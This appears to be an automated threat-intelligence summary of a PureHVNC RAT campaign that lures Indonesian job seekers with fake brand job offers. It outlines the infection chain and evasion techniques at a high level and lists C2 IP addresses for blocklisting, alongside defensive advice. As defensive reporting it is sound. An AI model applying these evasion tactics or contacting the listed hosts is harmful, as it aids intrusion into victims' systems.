This cybersecurity report details a sophisticated malware campaign involving PureHVNC RAT, which uses fake job offers from well-known brands to infect victims’ systems. The campaign employs multi-layered obfuscation techniques and advanced persistent methods to evade detection and maintain control of infected devices. #PureHVNC #AutoIt #ProcessHollowing #IndonesiaBrands
Keypoints
- The malware campaign targets individuals interested in marketing roles with a focus on Indonesian brands like John Hardy.
- Infection begins with deceptive LNK files masquerading as PDF job offers from reputed brands.
- Malicious scripts are hidden through encoding, string replacement, and embedding within fake media files.
- Persistence is maintained via JavaScript execution on startup and process hollowing techniques.
- The final payload, a PureHVNC RAT DLL, allows remote control over infected Windows systems.
A sophisticated PureHVNC RAT malware campaign uses multi-layered infection chains involving PowerShell, JavaScript, and AutoIt scripts, disguised through fake job offers from global and Indonesian brands to trick victims. The malware leverages advanced obfuscation and process hollowing to evade detection and maintain persistence on infected Windows systems.
Keypoints:
- The campaign targets individuals interested in marketing roles, using lures including Indonesia’s jewelry brand John Hardy, highlighting direct relevance to Indonesian citizens and businesses.
- Delivery starts with downloading deceptive LNK files masquerading as PDF job offers from reputed brands to initiate infection.
- Multi-layer obfuscation techniques hide malicious scripts, including encoding via base64, string replacement, and embedding within fake MP4 files.
- Persistence on infected machines is ensured via internet shortcuts executing obfuscated JavaScript on system startup.
- The attack injects malware payloads into Windows .NET framework processes using Process Hollowing for stealth execution.
- The final payload is an obfuscated PureHVNC RAT implemented as a decrypted DLL, capable of remote administration and control.
Relationship to Indonesia and Recommended Actions:
- Given the targeting of Indonesian brands, the campaign likely aims at Indonesian users; thus, Indonesia faces elevated risks from this malware.
- The government and cybersecurity institutions should enhance email and download filtering to detect and block suspicious LNK files exploiting fake job offers.
- Strengthen public-private partnerships with targeted Indonesian brands for rapid sharing of threat intelligence and update blacklists related to phishing domains and C2 IPs (e.g., 85.192.48.3, 139.99.188.124).
- Deploy advanced endpoint detection tools capable of identifying obfuscation tactics, PowerShell abuse, and process hollowing on public sector and critical infrastructure systems.
- Conduct targeted cybersecurity awareness campaigns focusing on employment-related cyber threats and encourage reporting of suspicious recruitment communications involving Indonesian brand impersonation.
What Indonesian Citizens Should Know and Do:
- Be highly cautious receiving job offers via email or downloads, especially files with double extensions like “.pdf.lnk” that may disguise malware.
- Verify legitimacy directly with the brand’s official recruitment channels before interacting with unexpected employment offers.
- Avoid opening unknown attachments or links purportedly from high-profile brands; report suspicious emails to cybersecurity authorities or the targeted company’s security team.